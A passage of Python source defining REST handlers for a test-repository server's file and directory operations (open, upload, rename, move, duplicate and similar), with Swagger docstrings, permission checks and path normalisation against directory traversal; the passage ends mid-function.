class TestsCreateDesignTpg(HandlerCORS):
    """
    /rest/tests/create/design/tpg
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: create the design of a test (plan and global)
        description: ''
        operationId: testsCreateDesignTpg
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, test-execution, test-properties, test-name, test-path, test-extension ]
              properties:
                project-id:
                  type: integer
                test-execution:
                  type: array
                  items:
                    type: string
                test-properties:
                  type: string
                test-name:
                  type: string
                test-path:
                  type: string
                test-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                status:
                  type: boolean
                error-msg:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/check/design/tpg",
                  "status": True,
                  "error-msg": "...."
                }
          '400':
            description: Bad request provided
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # every request field below is mandatory; a missing one is a 400
        mandatory = [
            ("project-id", "Please specify a project id"),
            ("test-execution", "Please specify a test execution"),
            ("test-properties", "Please specify a test properties"),
            ("test-name", "Please specify a test name"),
            ("test-path", "Please specify a test path"),
            ("test-extension", "Please specify a test extension"),
        ]
        try:
            fields = {}
            for field_name, missing_msg in mandatory:
                fields[field_name] = self.request.data.get(field_name)
                if fields[field_name] is None:
                    raise EmptyValue(missing_msg)
            projectId = fields["project-id"]
            testName = fields["test-name"]
            testPath = fields["test-path"]
            testExtension = fields["test-extension"]
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # this endpoint only handles test-global (tgx) and test-plan (tpx)
        if testExtension not in ["tgx", "tpx"]:
            raise HTTP_400("Bad test extension provided (%s)" % testExtension)

        # inline the referenced test files into the execution data
        if testExtension == "tgx":
            success, error_msg, self.request.data["test-execution"] = RepoTests.instance().addtf2tg(
                data_=self.request.data["test-execution"]
            )
            if success != Context.instance().CODE_OK:
                return {"cmd": self.request.path,
                        "status": False, "error-msg": error_msg}

        if testExtension == "tpx":
            success, error_msg = RepoTests.instance().addtf2tp(
                data_=self.request.data["test-execution"]
            )
            if success != Context.instance().CODE_OK:
                return {"cmd": self.request.path,
                        "status": False, "error-msg": error_msg}

        # build a transient task only to compute the design, then drop it
        task = TaskManager.getObjectTask(
            testData=self.request.data, testName=testName,
            testPath=testPath, testUser=user_profile["login"],
            testId=0, testBackground=False,
            projectId=projectId,
            # statsmgr=StatsManager.instance(),
            context=Context
        )
        parsed = task.parseTestDesign()
        del task

        rsp = {"cmd": self.request.path,
               "error": parsed["error"],
               "error-msg": parsed["error-details"],
               "design": parsed["design"],
               "xml-design": parsed["design-xml"],
               }
        return rsp
class TestsFileDownload(HandlerCORS):
    """
    /rest/tests/file/download
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: download file from the test storage
        description: ''
        operationId: testsFileDownload
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                file-content:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/download",
                  "file-content": "...."
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # pull and validate the two mandatory request fields
        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # normalize the path to defeat directory-traversal attempts
        filePath = os.path.normpath("/" + filePath)

        getFileResult = RepoTests.instance().getFile(pathFile=filePath,
                                                     binaryMode=True,
                                                     project=projectId,
                                                     addLock=False)
        # getFile returns an 8-tuple; only the code and the content matter here
        success = getFileResult[0]
        content = getFileResult[5]
        if success != Context.instance().CODE_OK:
            raise HTTP_500("Unable to download file")

        return {"cmd": self.request.path, "file-content": content}
class TestsFileOpen(HandlerCORS):
    """
    /rest/tests/file/open
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: open and lock file from the test storage
        description: ''
        operationId: testsFileOpen
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
                ignore-lock:
                  type: boolean
                read-only:
                  type: boolean
                custom-param:
                  type: integer
                destination-id:
                  type: integer
                action-id:
                  type: integer
                extra:
                  type: object
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                file-content:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/open",
                  "file-content": "...."
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            # mandatory parameters
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a file path")
            # optional open flags; defaults keep the normal open-and-lock flow
            _ignoreLock = self.request.data.get("ignore-lock", False)
            _readOnly = self.request.data.get("read-only", False)
            # optional client round-trip values, echoed back unchanged in the response
            _customParam = self.request.data.get("custom-param")
            _actId = self.request.data.get("action-id")
            _destId = self.request.data.get("destination-id")
            # new in v19, extra parameters used only by the qt client
            # these parameters were introduced by the pull request from the
            # dbr13 contributor.
            # update_location is true when the test location referenced in a
            # testplan/testglobal is updated; the old test location is also
            # provided to search for it in other files and update it
            extra_update_location = self.request.data.get(
                'extra', {}).get('update_location', False)
            # the old test location from testplan/testglobal
            # these parameters are only used when update_location is True
            extra_filename = self.request.data.get(
                'extra', {}).get('file_name', '')
            extra_ext = self.request.data.get('extra', {}).get('file_ext', '')
            extra_projectid = self.request.data.get(
                'extra', {}).get('project_id', 0)
            extra_path = self.request.data.get(
                'extra', {}).get('file_path', '')
            # referer of the origin file (testplan or testglobal) which asked
            # to open this file: its path and project id if provided; the
            # refresh flag indicates whether the referer file must be
            # refreshed by the client afterwards
            extra_file_referer_path = self.request.data.get(
                'extra', {}).get('file_referer_path', '')
            extra_file_referer_projectid = self.request.data.get(
                'extra', {}).get('file_referer_projectid', 0)
            extra_file_referer_refresh = self.request.data.get(
                'extra', {}).get('file_referer_refresh', False)
            # provide a specific sub test id in a testplan or testglobal;
            # this parameter comes from the "find test usage" function
            extra_subtest_id = self.request.data.get(
                'extra', {}).get('subtest_id', '')
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)

        # when both a destination and an action id are supplied, the open is
        # an internal lookup for the client, so force a plain read with no lock
        addLock = True
        if _destId is not None and _actId is not None:
            addLock = False
            _ignoreLock = False
            _readOnly = False

        resultGetFile = RepoTests.instance().getFile(pathFile=filePath,
                                                     project=projectId,
                                                     login=user_profile['login'],
                                                     forceOpen=_ignoreLock,
                                                     readOnly=_readOnly,
                                                     addLock=addLock)
        # getFile returns: code, path, name, extension, project id,
        # base64 content, lock flag, lock owner
        success, path_file, name_file, ext_file, project, data_base64, locked, locked_by = resultGetFile
        if success != Context.instance().CODE_OK:
            raise HTTP_500("Unable to open test file")

        rsp_rest = {"cmd": self.request.path,
                    "file-content": data_base64,
                    "file-path": path_file,
                    "file-name": name_file,
                    "file-extension": ext_file,
                    "locked": locked,
                    "locked-by": locked_by,
                    "project-id": project,
                    "custom-param": _customParam,
                    "action-id": _actId,
                    "destination-id": _destId,
                    "referer-refresh": extra_file_referer_refresh,
                    "subtest-id": str(extra_subtest_id)}
        # dbr13 >>> when we set checkbox in the Update->Location
        if extra_update_location:
            file_path = path_file or '/'
            # rewrite every testplan/testglobal entry that still points to
            # the old location so it references the file just opened
            RepoTests.instance().updateLinkedScriptPath(project=extra_projectid,
                                                        mainPath=extra_path,
                                                        oldFilename=extra_filename,
                                                        extFilename=extra_ext,
                                                        newProject=projectId,
                                                        newPath=file_path,
                                                        newFilename=name_file,
                                                        newExt=ext_file,
                                                        user_login=user_profile['login'],
                                                        file_referer_path=extra_file_referer_path,
                                                        file_referer_projectid=extra_file_referer_projectid
                                                        )
        # dbr13 <<<
        return rsp_rest
class TestsFileUpload(HandlerCORS):
    """
    /rest/tests/file/upload
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Upload file the test storage
        description: ''
        operationId: testsFileUpload
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path, file-name, file-extension, file-content ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
                file-name:
                  type: string
                file-extension:
                  type: string
                file-content:
                  type: string
                overwrite:
                  type: boolean
                close-after:
                  type: boolean
                add-folders:
                  type: boolean
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                code:
                  type: integer
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/upload",
                  "code": 200
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # monitor-level users are not allowed to write to the repository
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a file path")
            fileName = self.request.data.get("file-name")
            if fileName is None:
                raise EmptyValue("Please specify a file name")
            fileExt = self.request.data.get("file-extension")
            if fileExt is None:
                raise EmptyValue("Please specify a file extension")
            fileContent = self.request.data.get("file-content")
            if fileContent is None:
                raise EmptyValue("Please specify a file content")

            # optional flags
            _overwrite = self.request.data.get("overwrite", False)
            _closeafter = self.request.data.get("close-after", False)
            _addfolders = self.request.data.get("add-folders", False)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal (fix: every other file handler in this
        # module normalizes the client-provided path before use; upload
        # previously passed it through unchanged)
        filePath = os.path.normpath("/" + filePath)

        putFileReturn = RepoTests.instance().uploadFile(pathFile=filePath,
                                                        nameFile=fileName,
                                                        extFile=fileExt,
                                                        contentFile=fileContent,
                                                        login=user_profile['login'],
                                                        project=projectId,
                                                        overwriteFile=_overwrite,
                                                        createFolders=_addfolders,
                                                        lockMode=True,
                                                        binaryMode=True,
                                                        closeAfter=_closeafter)
        # uploadFile returns a 9-tuple describing the stored file and its lock state
        success, pathFile, nameFile, extFile, project, overwriteFile, closeAfter, isLocked, lockedBy = putFileReturn

        return {"cmd": self.request.path,
                "code": success,
                "file-path": pathFile,
                "file-name": nameFile,
                "file-extension": extFile,
                "project-id": project,
                "overwrite": overwriteFile,
                "close-after": closeAfter,
                "locked": isLocked,
                "locked-by": lockedBy}
class TestsFileRemove(HandlerCORS):
    """
    /rest/tests/file/remove
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: remove file in the test storage
        description: ''
        operationId: testsFileRemove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/remove",
                  "message": "file successfully removed"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # monitor-level users are not allowed to modify the repository
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if not filePath:
                raise EmptyValue("Please specify a file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)

        success = RepoTests.instance().delFile(
            pathFile=filePath, project=projectId, supportSnapshot=False)
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to remove file")
        if success == Context.instance().CODE_FAILED:
            raise HTTP_403("Remove file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        # fix: message spelling now matches the documented example above
        # ("successfully", previously "sucessfully")
        return {"cmd": self.request.path, "message": "file successfully removed",
                "project-id": projectId}
class TestsFileUnlock(HandlerCORS):
    """
    /rest/tests/file/unlock
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: unlock file in the test storage
        description: ''
        operationId: testsFileUnlock
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path, file-name, file-extension ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
                file-name:
                  type: string
                file-extension:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/unlock",
                  "message": "file successfully unlocked"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileName = self.request.data.get("file-name")
            if fileName is None:
                raise EmptyValue("Please specify a source file filename")
            fileExt = self.request.data.get("file-extension")
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal; the open endpoint normalizes the path
        # before taking the lock, so unlock must normalize the same way to
        # address the same lock entry
        filePath = os.path.normpath("/" + filePath)

        success = RepoTests.instance().unlockFile(pathFile=filePath,
                                                  nameFile=fileName,
                                                  extFile=fileExt,
                                                  project=projectId,
                                                  login=user_profile["login"])
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to unlock test file")

        # fix: message spelling now matches the documented example above
        # ("successfully", previously "sucessfully")
        return {"cmd": self.request.path, "message": "file successfully unlocked",
                "project-id": projectId}
# dbr13 >>>
class TestsFindFileUsage(HandlerCORS):
    """
    /tests/find/file-usage
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Finding script usages included in test plans and globals
        description: ''
        operationId: testsFindFileUsage
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, file-path ]
              properties:
                project-id:
                  type: integer
                file-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                folder-content:
                  type: dict
            examples:
              application/json: |
                {
                  "cmd": "/tests/find/file-usage",
                  "folder-content": {}
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        try:
            projectId = self.request.data.get("project-id")
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("file-path")
            if filePath is None:
                raise EmptyValue("Please specify a source filepath")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # checking input
        # unlike the other handlers, this one strictly requires an int id
        if not isinstance(projectId, int):
            raise HTTP_400("Bad project id provided in request, int expected")

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # NOTE(review): filePath is passed to the search without the
        # os.path.normpath("/" + ...) normalization used by sibling handlers;
        # presumably getTestFileUsage matches paths as stored — confirm
        # whether normalizing here would break the lookup before changing it
        response = RepoTests.instance().getTestFileUsage(file_path=filePath,
                                                         project_id=projectId,
                                                         user_login=user_profile['login'])

        return {
            'cmd': self.request.path,
            'response': response,
            "usage-file-path": filePath,
            "usage-project-id": projectId
        }
class TestsFileRename(HandlerCORS):
    """
    /rest/tests/file/rename
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Rename file in the test storage
        description: ''
        operationId: testsFileRename
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, file-name, file-path, file-extension ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ file-name ]
                  properties:
                    file-name:
                      type: string
                upload_location:
                  required: [upload_location]
                  properties:
                    upload_location: boolean
        responses:
          '200':
            description: rename response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/rename",
                  "message": "file successfully renamed"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # monitor-level users are not allowed to modify the repository
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify source")

            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue("Please specify a project id")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source filepath")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source file filename")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")

            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify destination")
            newFileName = self.request.data.get("destination")["file-name"]
            if newFileName is None:
                raise EmptyValue("Please specify a destination file name")

            # dbr13 >>>
            # NOTE(review): the swagger schema above documents this flag as
            # "upload_location" but the code reads "update_location" — confirm
            # which name the clients actually send
            update_location = self.request.data.get("update_location", False)
            # dbr13 <<<
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)

        success = RepoTests.instance().renameFile(
            mainPath=filePath,
            oldFilename=fileName,
            newFilename=newFileName,
            extFilename=fileExt,
            project=projectId,
            supportSnapshot=False
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to rename file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Rename file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        # dbr13 >>>
        # When we set checkbox in the rename dialog, propagate the new name
        # to every testplan/testglobal that references the renamed file
        if update_location:
            RepoTests.instance().updateLinkedScriptPath(
                project=projectId,
                mainPath=filePath,
                oldFilename=fileName,
                extFilename=fileExt,
                newProject=projectId,
                newPath=filePath,
                newFilename=newFileName,
                newExt=fileExt,
                user_login=user_profile['login'])
        # dbr13 <<<

        # fix: message spelling now matches the documented example above
        # ("successfully", previously "sucessfully")
        return {"cmd": self.request.path, "message": "file successfully renamed",
                "project-id": projectId,
                "file-path": filePath,
                "file-name": fileName,
                "file-extension": fileExt,
                "new-file-name": newFileName}
class TestsFileDuplicate(HandlerCORS):
    """
    /rest/tests/file/duplicate
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Duplicate file in the test storage
        description: ''
        operationId: testsFileDuplicate
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, file-name, file-path, file-extension ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ project-id, file-path, file-name ]
                  properties:
                    project-id:
                      type: integer
                    file-path:
                      type: string
                    file-name:
                      type: string
        responses:
          '200':
            description: rename response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/rename",
                  "message": "file successfully renamed"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        # get the user profile
        user_profile = _get_user(request=self.request)

        # monitor-level users are not allowed to modify the repository
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # checking json request on post
        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify source")

            # fix: "projcet-id" typo corrected in the error message below
            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue("Please specify a source project-id")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source filename")
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")

            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify destination")
            newProjectId = self.request.data.get("destination")["project-id"]
            if newProjectId is None:
                raise EmptyValue("Please specify a project id")
            newFileName = self.request.data.get("destination")["file-name"]
            if newFileName is None:
                raise EmptyValue("Please specify a destination file name")
            newFilePath = self.request.data.get("destination")["file-path"]
            if newFilePath is None:
                raise EmptyValue("Please specify a destination file path")
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the user must have access to both the source and destination projects
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=newProjectId)

        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        newFilePath = os.path.normpath("/" + newFilePath)

        success = RepoTests.instance().duplicateFile(
            mainPath=filePath,
            oldFilename=fileName,
            newFilename=newFileName,
            extFilename=fileExt,
            project=projectId,
            newProject=newProjectId,
            newMainPath=newFilePath
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to duplicate file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Duplicate file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        # fix: "successfully" spelling corrected (previously "sucessfully")
        return {"cmd": self.request.path, "message": "file successfully duplicated",
                "project-id": projectId}
class TestsFileMove(HandlerCORS):
    """
    /rest/tests/file/move
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Move file in the test storage
        description: ''
        operationId: testsFileMove
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ source, destination ]
              properties:
                source:
                  type: object
                  required: [ project-id, file-name, file-path, file-extension ]
                  properties:
                    project-id:
                      type: integer
                    file-name:
                      type: string
                    file-path:
                      type: string
                    file-extension:
                      type: string
                destination:
                  type: object
                  required: [ project-id, file-path ]
                  properties:
                    project-id:
                      type: integer
                    file-path:
                      type: string
                upload_location:
                  required: [upload_location]
                  properties:
                    upload_location: boolean
        responses:
          '200':
            description: move response
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/file/move",
                  "message": "file successfully moved"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # monitor-level users are not allowed to modify the repository
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        try:
            source = self.request.data.get("source")
            if source is None:
                raise EmptyValue("Please specify source")

            projectId = self.request.data.get("source")["project-id"]
            if projectId is None:
                raise EmptyValue(
                    "Please specify a project name or a project id")
            # fix: the two error messages below were swapped — a missing
            # file-path reported "filename" and a missing file-name reported
            # "file path"
            filePath = self.request.data.get("source")["file-path"]
            if filePath is None:
                raise EmptyValue("Please specify a source file path")
            fileName = self.request.data.get("source")["file-name"]
            if fileName is None:
                raise EmptyValue("Please specify a source filename")
            fileExt = self.request.data.get("source")["file-extension"]
            if fileExt is None:
                raise EmptyValue("Please specify a source file extension")

            destination = self.request.data.get("destination")
            if destination is None:
                raise EmptyValue("Please specify destination")
            newProjectId = self.request.data.get("destination")["project-id"]
            if newProjectId is None:
                raise EmptyValue("Please specify a new project id")
            newFilePath = self.request.data.get("destination")["file-path"]
            if newFilePath is None:
                raise EmptyValue("Please specify a destination file path")

            update_location = self.request.data.get("update_location", False)
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        # the user must have access to both the source and destination projects
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)
        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=newProjectId)

        # avoid directory traversal
        filePath = os.path.normpath("/" + filePath)
        newFilePath = os.path.normpath("/" + newFilePath)

        success = RepoTests.instance().moveFile(
            mainPath=filePath,
            fileName=fileName,
            extFilename=fileExt,
            newPath=newFilePath,
            project=projectId,
            newProject=newProjectId,
            supportSnapshot=True
        )
        if success == Context.instance().CODE_ERROR:
            raise HTTP_500("Unable to move file")
        if success == Context.instance().CODE_ALREADY_EXISTS:
            raise HTTP_403("Move file denied")
        if success == Context.instance().CODE_NOT_FOUND:
            raise HTTP_404("File does not exists")

        # propagate the new location to every testplan/testglobal that
        # references the moved file
        if update_location:
            RepoTests.instance().updateLinkedScriptPath(project=projectId,
                                                        mainPath=filePath,
                                                        oldFilename=fileName,
                                                        extFilename=fileExt,
                                                        newProject=newProjectId,
                                                        newPath=newFilePath,
                                                        newFilename=fileName,
                                                        newExt=fileExt,
                                                        user_login=user_profile['login'],
                                                        )

        return {"cmd": self.request.path, "message": "file successfully moved",
                "project-id": projectId}
class TestsDirectoryAdd(HandlerCORS):
    """
    /rest/tests/directory/add
    """
    @_to_yaml
    def post(self):
        """
        tags:
          - tests
        summary: Add directory in the test storage
        description: ''
        operationId: testsDirectoryAdd
        consumes:
          - application/json
        produces:
          - application/json
        parameters:
          - name: Cookie
            in: header
            description: session_id=NjQyOTVmOWNlMDgyNGQ2MjlkNzAzNDdjNTQ3ODU5MmU5M
            required: true
            type: string
          - name: body
            in: body
            required: true
            schema:
              required: [ project-id, directory-name, directory-path ]
              properties:
                project-id:
                  type: integer
                directory-name:
                  type: string
                directory-path:
                  type: string
        responses:
          '200':
            schema :
              properties:
                cmd:
                  type: string
                message:
                  type: string
            examples:
              application/json: |
                {
                  "cmd": "/tests/directory/add",
                  "message": "directory successfully added"
                }
          '400':
            description: Bad request provided
          '403':
            description: Access denied to this project
          '500':
            description: Server error
        """
        user_profile = _get_user(request=self.request)

        # write operations are forbidden for monitor-level users
        if user_profile['monitor']:
            raise HTTP_403("Access refused")

        # each mandatory field is rejected with its own message when absent
        try:
            checks = (("project-id", "Please specify a project id"),
                      ("directory-name", "Please specify a source folder name"),
                      ("directory-path", "Please specify a source folder path"))
            parsed = {}
            for key, missing_msg in checks:
                parsed[key] = self.request.data.get(key)
                if parsed[key] is None:
                    raise EmptyValue(missing_msg)
            projectId = parsed["project-id"]
            folderName = parsed["directory-name"]
            folderPath = parsed["directory-path"]
        except EmptyValue as e:
            raise HTTP_400("%s" % e)
        except Exception as e:
            raise HTTP_400("Bad request provided (%s ?)" % e)

        _check_project_permissions(
            user_login=user_profile['login'],
            project_id=projectId)

        # normalize the parent path to defeat directory-traversal attempts
        folderPath = os.path.normpath("/" + folderPath)

        success = RepoTests.instance().addDir(
            pathFolder=folderPath,
            folderName=folderName,
